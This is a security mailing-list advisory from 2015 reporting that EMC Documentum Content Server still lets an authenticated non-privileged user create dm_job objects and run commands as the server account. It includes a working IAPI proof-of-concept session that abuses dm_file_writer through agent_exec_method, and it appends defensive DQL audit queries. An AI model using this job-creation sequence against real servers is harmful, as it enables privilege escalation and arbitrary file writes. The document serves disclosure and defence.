Date: Wed, 1 Jul 2015 16:39:10 +1000
From: <andrew@...filov.tel>
To: "Bugtraq" <bugtraq@...urityfocus.com>
Subject: Extra information for CVE-2014-4626 - EMC Documentum Content Server: authenticated user is able to elevate privileges, hijack Content Server filesystem, execute arbitrary commands by creating malicious dm_job objects

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed


In April 2014 I discovered a vulnerability in EMC Documentum Content Server
which allows an authenticated user to elevate privileges, hijack the Content
Server filesystem or execute arbitrary commands by creating malicious dm_job
objects (for a detailed description see VRF#HUFU6FNP.txt and
VRF#HUFV0UZN.txt).

In October 2014 the vendor announced ESA-2014-105, which claimed that the
vulnerability had been remediated.

In November 2014 the fix was contested (there was a significant delay after
ESA-2014-105 because the vendor constantly fails to provide the status of
reported vulnerabilities) by providing a PoC similar to the one described in
VRF#HUGC34JH.txt; the description provided to CERT/CC (another CNA was chosen
because the vendor fails to communicate) was:
=================================8<================================
The problem is that a non-privileged user is able to create dm_job objects and
execute the corresponding docbase methods (some examples of "malicious" methods
are given in VRF#HUFU6FNP, also see VRF#HUFV0UZN); the word "create" here
means any sequence of commands which results in the existence of a dm_job
object. The PoC in VRF#HUFU6FNP describes an attack on the scheduler: the
scheduler does not schedule jobs unless they are owned by a superuser, so the
command sequence in that case was "create dm_job and update dm_job". EMC thinks
that they have fixed the vulnerability, but they just fixed the sequence given
in the PoC; another sequence is "create dm_sysobject, update dm_sysobject &
change dm_sysobject" - see VRF#HUGC34JH, it's an already known attack.
Also, I could provide a third PoC related to this report, but I do not think
that would be useful for EMC.
=================================>8================================


The current status of CVE-2014-4626 is obscure; the last public status can be
found in the CERT/CC spreadsheet (http://www.kb.cert.org/vuls/id/315340):
=================================8<================================
The new exploit is being tracked under PSRC-2494.
This is targeted for Q1 2015 (March patch).
=================================>8================================

Though the latest builds of EMC Documentum Content Server successfully pass the
PoCs described previously:
=================================8<================================
API> create,c,dm_job
...
08024be980006902
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
[DM_SYSOBJECT_E_CANT_CHANGE_OWNER_NAME]error:
   "Must have system admin privileges or superuser privileges
    to change the owner_name to 'dmadmin'."



API> create,c,dm_sysobject
...
08024be980006904
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
OK
API> ?,c,change dm_sysobject object to dm_job
                       where r_object_id='08024be980006904'
[DM_QUERY_F_CHANGE_SAVE]fatal:  "CHANGE:  An unexpected save
       error has occurred for object 08024be980006904."

[DM_USER_E_NEED_SU_OR_SYS_FOR_OBJECT_CHANGE]error:
      "The current user (test) needs to have superuser or sysadmin
       privilege to create or save or destroy objects of type (dm_job)."
=================================>8================================


the vulnerability remains unfixed; below is another PoC (the job engine in
Documentum consists of two parts, a scheduler and an executor; the previous
attacks were designed to exploit the vulnerability in the scheduler, this one
demonstrates how to exploit the vulnerability in the job executor):
=================================8<================================
API> create,c,dm_job
...
08024be98000690e
API> set,c,l,object_name
SET> malicious job
...
OK
API> set,c,l,inactivate_after_failure
SET> 0
...
OK
API> set,c,l,max_iterations
SET> 0
...
OK
API> set,c,l,method_name
SET> dm_file_writer
...
OK
API> set,c,l,pass_standard_arguments
SET> 0
...
OK
API> set,c,l,run_interval
SET> 1
...
OK
API> set,c,l,run_mode
SET> 1
...
OK
API> set,c,l,run_now
SET> 1
...
OK
API> set,c,l,is_inactive
SET> 0
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> append,c,l,method_arguments
SET> /tmp/test.txt
...
OK
API> append,c,l,method_arguments
SET> agentexec_has_vulnerability
...
OK
API> append,c,l,method_arguments
SET> CREATE
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,agent_exec_method,
         ARGUMENTS,S,'
             -docbase_name DCTM_DEV.DCTM_DEV
             -docbase_owner dmadmin
             -job_id 08024be98000690e
             -log_directory /u01/documentum/cs/dba/log
             -docbase_id 150505
             -trace_level 10
        '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 91436
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 60
  app_server_host_name            :
  app_server_port                 : 0
  app_server_uri                  :
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> Bye
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
=================================>8================================

__
Regards,
Andrey B. Panfilov 

Attachment: VRF#HUFU6FNP.txt (text/plain, 6310 bytes)

Attachment: VRF#HUFV0UZN.txt (text/plain, 5697 bytes)

Attachment: VRF#HUGC34JH.txt (text/plain, 11940 bytes)
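As an added audit example (not part of the advisory above and not EMC's code), the DQL queries below let a docbase administrator look for what the two attack patterns leave behind: dm_job objects created by, or re-owned away from, a non-privileged account, and jobs aimed at methods the Content Server runs under its own OS account. They assume the standard dm_job, dm_user and dm_method attributes (owner_name, r_creator_name, r_creation_date, method_name, run_now, is_inactive, user_privileges, method_verb, run_as_server, launch_direct, use_method_server) and that a dm_user.user_privileges value of 8 or 16 marks a sysadmin or superuser; verify both against your installation. Run them as a superuser (object ACLs hide rows from lesser accounts) in IDQL, or from IAPI as `?,c,<query>`; the `--` comment lines are for the reader and must be dropped when pasting, since IDQL and IAPI take one bare statement at a time.

```sql
-- Added audit queries; assumptions: standard Documentum dm_job / dm_user /
-- dm_method attributes, and user_privileges >= 8 meaning sysadmin (8) or
-- superuser (16). Adjust if your docbase uses different privilege values.

-- 1. Jobs created by an account without sysadmin/superuser privilege, or whose
--    owner no longer matches its creator (the "create dm_job, then change
--    owner_name to dmadmin" scheduler attack). A stock docbase has its jobs
--    created and owned by the install owner, so any hit deserves a look.
select j.r_object_id, j.object_name, j.owner_name, j.r_creator_name,
       j.r_creation_date, j.method_name, j.run_now, j.is_inactive
  from dm_job j
 where j.r_creator_name not in
         (select u.user_name from dm_user u where u.user_privileges >= 8)
    or j.owner_name <> j.r_creator_name
 order by j.r_creation_date desc;

-- 2. Jobs whose method runs as the server's OS account (run_as_server = TRUE).
--    With attacker-controlled method_arguments such a job writes files or runs
--    commands as the install owner, which is what the dm_file_writer PoC does.
--    Newest first, so a job planted today sorts to the top; inspect each hit
--    with dump,c,<r_object_id> to read its method_arguments.
select j.r_object_id, j.object_name, j.owner_name, j.r_creator_name,
       j.r_creation_date, j.run_now, j.method_name,
       m.method_verb, m.launch_direct, m.use_method_server
  from dm_job j, dm_method m
 where j.method_name = m.object_name
   and m.run_as_server = TRUE
 order by j.r_creation_date desc;
```

Both queries are reactive: they find objects an attacker has already saved, they do not stop a non-superuser from saving them, and a job that was created, executed through DO_METHOD and destroyed in one session leaves nothing for them to find. Against the PoC above, query 1 returns the job because its creator is `test`, and query 2 returns it because dm_file_writer runs as the server account; that second list is also the inventory of methods worth restricting regardless of whether a job currently references them.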
